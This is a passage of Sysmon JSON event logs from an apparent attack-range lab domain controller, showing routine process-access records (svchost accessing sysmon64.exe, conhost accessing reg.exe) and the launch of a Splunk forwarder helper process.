07:54:08.417","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2708,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.417\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.417","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2709,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.417\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.417","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2710,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.417\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.417","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2711,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.417\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.417","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2712,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.417\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.417","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2713,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.417\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.417","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2714,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.417\r\nSourceProcessGUID: {41C8662E-1FA0-5F25-0000-00107BD50400}\r\nSourceProcessId: 4936\r\nSourceThreadId: 4956\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FA0-5F25-0000-001032D80400}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\system32\\reg.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.417","SourceProcessGUID":"{41C8662E-1FA0-5F25-0000-00107BD50400}","SourceProcessId":"4936","SourceThreadId":"4956","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FA0-5F25-0000-001032D80400}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\system32\\reg.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2715,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.124\r\nProcessGuid: {41C8662E-1FB7-5F25-0000-00108DDD0400}\r\nProcessId: 4200\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.124","ProcessGuid":"{41C8662E-1FB7-5F25-0000-00108DDD0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
